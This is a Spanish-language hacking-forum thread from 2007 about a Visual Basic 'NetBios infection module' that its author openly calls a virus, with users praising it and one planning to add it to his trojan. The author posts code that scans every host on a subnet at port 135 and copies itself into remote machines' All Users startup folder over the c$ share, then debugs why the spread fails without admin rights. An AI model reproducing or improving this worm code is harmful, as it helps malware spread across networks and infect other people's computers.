[Source] NetBios infection Module (ojo que es peligroso!)

Iniciado por Mad Antrax, 14 Julio 2007, 20:56 PM

0 Miembros y 2 Visitantes están viendo este tema.

wACtOr

muy weno mad, eres tremendo. e hestado probandolo con mis 3 pcs, pero deben estar parcheados por que no crea el upodater.exe

por cierto, me puedes explicar a si por encima como usar los modulos socketmaster?

es que me gustaria incluirlos en mi troya, pero no se como funcionan.

gracias mad y otra vez, un EXCELENTE trabajo

Mad Antrax

Cita de: wACtOr en 14 Julio 2007, 23:14 PM
muy weno mad, eres tremendo. e hestado probandolo con mis 3 pcs, pero deben estar parcheados por que no crea el upodater.exe

por cierto, me puedes explicar a si por encima como usar los modulos socketmaster?

es que me gustaria incluirlos en mi troya, pero no se como funcionan.

gracias mad y otra vez, un EXCELENTE trabajo

Tienes un grupo de trabajo creado con tus 3 PC''s?
Tienes firewall habilitado en alguno de tus PC''s
Están los 3 equipos dentro de la misma subred?
Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''s?

Lo de CSocketMaster es fácil, si te lo bajas de www.pscode.com trae un TXT explicándolo.

Saludos!!
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

~~

Clap clap clap excelente Mad, esta vez te has salido  ;)

wACtOr

CitarTienes un grupo de trabajo creado con tus 3 PC''''s?
Tienes firewall habilitado en alguno de tus PC''''s
Están los 3 equipos dentro de la misma subred?
Tienes habilitado el servicio de Compartir archivos e impresoras en los 3 PC''''s?
Si a todo, como en windows xDD
si tengo todo ello hecho. lo de la subred es el mismo rango de ip no? me explico un poco : una subred seria por ejemplo 192.168.1.12, 192.168.1.13, etc.

si por ejemplo tuviera 192.168.0.12 y 192.168.1.13 no seria una subred. es asi??

Gracias.

PD aora me bajo de pscode a ver si saco algo en claro


Sancho.Mazorka

Perfecto!!!  Sos un idolo con VB6, ojala que sigas asi (y que mejores  :xD)


Sancho.Mazorka    :¬¬
Ganador Xeon Web Server ! ! !    Sancho.Mazorka :D
http://foro.elhacker.net/index.php/topic,171903.75.html



Karcrack

Esto me va a venir de perlas  :P.
Gran aporte MadAntrax  :o

Meg

#16
Esta vez te has lucio  ;D, na enserio esta muy bien ese codigo... tanto estudiar en clase de redes sobre subneting y  de IP,s... y ahora ya se como puedo sacar buen provecho a todo eso  ;D la verdad es k no se me habia ocurrio xDD

3k1n0x

yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..
T3fL0n -> 3k1n0x

Mad Antrax

Cita de: Hexas en 18 Julio 2007, 05:36 AM
yo probe esto en una computadora conectada a otra en red lan, le probe con varias funciones de downloader haber si funka y nada no funka no se movio ni un pelito la otra pc, siempre chekeaba y nada q aparece el uptader.exe en ningun lado supongo q aparece en una carpeta de esas raras con %..., no funciono nada, a lo mejor era el firewall q se reia de mi :xD, q va.. no era el firewall xq lo desactive tambien hasta el antivirus y no funka, y eso de tener activado compartir impresoras ps si esta xq sencillamente mandas a imprimir algo desde esa pc y lo imprime en la pc (la otra) sera q sta mal el codigo¿ o ya hay parche¿ intentare de nuevo..

Uaaaa, ya sé porqué no te funciona. (Ha sido un fallo mio).

Código (vb) [Seleccionar]
For i = 1 To 254                                            'Bucle desde X.X.X.1 hasta X.X.X.254
        If WS.State <> sckClosed Then WS.CloseSck               'Si el Socket no está cerrado, lo cerramos para evitar errores.
        DoEvents                                                'Esperamos...
            WS.Connect SubNet & "." & i, 135                    'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios)
        [b]Sleep 500[/b]                                               'Esperamos 1/2 Segundo...
        If WS.State = sckConnected And i <> MyHost Then         'Si el Hosts es vulnerable y el Host no es MiPC entonces...
            AliveHosts = AliveHosts & i & ","                   '   añadimos el octeto del Host en el Array
        End If                                                  'End If
    Next i


Es por culpa del Sleep, esa función "duerme" todas las acciones del VB, incluido el IF que hay debajo, por eso en algunos equipos el scanning no funcionara del todo bien. Luego mejoro eso.

Otro error...

Código (vb) [Seleccionar]
tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio"

Se copia en el perfil All Users, ese perfil está como solo lectura para todos los usuarios y escritura para los Administradores. Si el equipo desde donde lanzas el virus no es administrador de los otros equipos no logrará copiarse. En mi caso utilizo un dominio y lo lancé bajo los credenciales de Administrador del Dominio, por eso a mi me ha funcionado y a ti no. Lo he probado en un grupo de trabajo normal y no funciona xD

Este fin de semana me pongo y lo arreglo, ok? Lo siento y saludos!!
No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.

3k1n0x

alguien a hecho algo ? nose algo para ver si funka o mandrax o alguien sabe donde esta el fallo¿
T3fL0n -> 3k1n0x